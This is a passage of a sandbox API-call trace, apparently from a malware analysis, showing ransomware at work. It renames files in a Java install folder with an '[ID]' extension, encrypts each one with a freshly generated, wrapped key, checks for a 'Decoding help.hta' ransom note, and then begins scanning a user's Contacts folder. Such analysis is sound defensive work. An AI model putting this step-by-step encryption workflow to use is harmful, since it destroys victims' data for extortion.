lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="release" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release" [0040.274] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release" [0040.274] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.[ID]g9uZrLhJaygpwRm1[ID]" [0040.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release" (normalized: "c:\\program files (x86)\\java\\jre7\\release"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\release.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\release.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0041.150] CreateFileMappingA (hFile=0x314, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x220 [0041.150] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x3449028) returned 1 [0043.543] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x5a5870) returned 1 [0043.543] CryptExportKey (in: hKey=0x5a5870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0043.543] MapViewOfFile (hFileMappingObject=0x220, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e0) returned 0x4410000 [0043.546] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0043.546] CryptEncrypt (in: hKey=0x5a5870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0xcccfce4*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x4410000*, pdwDataLen=0xcccfce4*=0x1e0) returned 1 [0043.546] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.547] CloseHandle (hObject=0x220) returned 1 [0043.548] CryptDestroyKey (hKey=0x5a5870) returned 1 [0043.548] CryptReleaseContext (hProv=0x3449028, dwFlags=0x0) returned 1 [0043.548] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.548] WriteFile (in: hFile=0x314, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.549] WriteFile (in: hFile=0x314, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.549] CloseHandle (hObject=0x314) returned 1 [0043.549] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\release.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.550] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="THIRDPARTYLICENSEREADME-JAVAFX.txt", cAlternateFileName="THIRDP~1.TXT")) returned 1 [0043.550] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0043.550] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0043.550] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0043.550] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0x1 [0043.550] lstrcmpiW (lpString1="Decoding help.hta", lpString2="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned -1 [0043.550] lstrlenW (lpString="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 34 [0043.550] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0043.550] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0043.550] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0043.550] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="THIRDPARTYLICENSEREADME-JAVAFX.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" [0043.550] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" [0043.550] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0043.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme-javafx.txt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0043.551] CreateFileMappingA (hFile=0x314, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x220 [0043.551] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x3449028) returned 1 [0043.552] CryptGenKey (in: hProv=0x3449028, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x5a56f0) returned 1 [0043.552] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0043.552] MapViewOfFile (hFileMappingObject=0x220, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e8a0) returned 0x4520000 [0043.562] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0043.562] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4520000, pdwDataLen=0xcccfce4*=0x1e8a0, dwBufLen=0x1e8a0 | out: pbData=0x4520000*, pdwDataLen=0xcccfce4*=0x1e8a0) returned 1 [0043.713] UnmapViewOfFile (lpBaseAddress=0x4520000) returned 1 [0043.716] CloseHandle (hObject=0x220) returned 1 [0043.716] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0043.716] CryptReleaseContext (hProv=0x3449028, dwFlags=0x0) returned 1 [0043.716] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.716] WriteFile (in: hFile=0x314, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.717] WriteFile (in: hFile=0x314, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.717] CloseHandle (hObject=0x314) returned 1 [0043.719] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.719] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2b350, dwReserved0=0x0, dwReserved1=0x0, cFileName="THIRDPARTYLICENSEREADME.txt", cAlternateFileName="THIRDP~2.TXT")) returned 1 [0043.719] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0043.720] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0043.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0043.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0x1 [0043.720] lstrcmpiW (lpString1="Decoding help.hta", lpString2="THIRDPARTYLICENSEREADME.txt") returned -1 [0043.720] lstrlenW (lpString="THIRDPARTYLICENSEREADME.txt") returned 27 [0043.720] lstrcmpiW (lpString1="[ID]", lpString2=".txt") returned 1 [0043.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0043.720] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0043.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="THIRDPARTYLICENSEREADME.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" [0043.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" [0043.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.[ID]g9uZrLhJaygpwRm1[ID]" [0043.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0046.124] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x708 [0046.124] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x3448d80) returned 1 [0046.125] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x671a30) returned 1 [0046.125] CryptExportKey (in: hKey=0x671a30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0046.125] MapViewOfFile (hFileMappingObject=0x708, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2b340) returned 0x3210000 [0046.213] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0046.213] CryptEncrypt (in: hKey=0x671a30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3210000, pdwDataLen=0xcccfce4*=0x2b340, dwBufLen=0x2b340 | out: pbData=0x3210000*, pdwDataLen=0xcccfce4*=0x2b340) returned 1 [0046.405] UnmapViewOfFile (lpBaseAddress=0x3210000) returned 1 [0046.408] CloseHandle (hObject=0x708) returned 1 [0046.408] CryptDestroyKey (hKey=0x671a30) returned 1 [0046.408] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.408] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.408] WriteFile (in: hFile=0x31c, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.409] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.409] CloseHandle (hObject=0x31c) returned 1 [0046.411] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.411] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Welcome.html", cAlternateFileName="WELCOM~1.HTM")) returned 1 [0046.411] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0046.411] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0046.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" [0046.411] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\decoding help.hta")) returned 0x1 [0046.411] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Welcome.html") returned -1 [0046.411] lstrlenW (lpString="Welcome.html") returned 12 [0046.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0046.411] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned 40 [0046.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\", lpString2="Welcome.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" [0046.411] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" [0046.411] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.[ID]g9uZrLhJaygpwRm1[ID]" [0046.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\welcome.html.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0046.412] CreateFileMappingA (hFile=0x31c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x708 [0046.412] CryptAcquireContextA (in: phProv=0xcccfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcccfcec*=0x3448d80) returned 1 [0046.413] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0xcccfce8 | out: phKey=0xcccfce8*=0x671cf0) returned 1 [0046.413] CryptExportKey (in: hKey=0x671cf0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xcccfbe4, pdwDataLen=0xcccfce4 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfce4*=0x2c) returned 1 [0046.413] MapViewOfFile (hFileMappingObject=0x708, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c0) returned 0x530000 [0046.457] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xcccfbe4*, pdwDataLen=0xcccfcf8*=0x100) returned 1 [0046.458] CryptEncrypt (in: hKey=0x671cf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0xcccfce4*=0x3c0, dwBufLen=0x3c0 | out: pbData=0x530000*, pdwDataLen=0xcccfce4*=0x3c0) returned 1 [0046.458] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.459] CloseHandle (hObject=0x708) returned 1 [0046.459] CryptDestroyKey (hKey=0x671cf0) returned 1 [0046.459] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0046.459] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.459] WriteFile (in: hFile=0x31c, lpBuffer=0xcccfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0xcccfbe4*, lpNumberOfBytesWritten=0xcccfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.460] WriteFile (in: hFile=0x31c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xcccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xcccfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.460] CloseHandle (hObject=0x31c) returned 1 [0046.462] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\Welcome.html.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.462] FindNextFileW (in: hFindFile=0x5a5930, lpFindFileData=0xcccfd30 | out: lpFindFileData=0xcccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7438c420, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7438c420, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Welcome.html", cAlternateFileName="WELCOM~1.HTM")) returned 0 [0046.462] FindClose (in: hFindFile=0x5a5930 | out: hFindFile=0x5a5930) returned 1 Thread: id = 156 os_tid = 0x11c [0040.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5970 [0040.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.275] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.275] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.275] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0040.276] lstrcpyW (in: lpString1=0x42b8870, 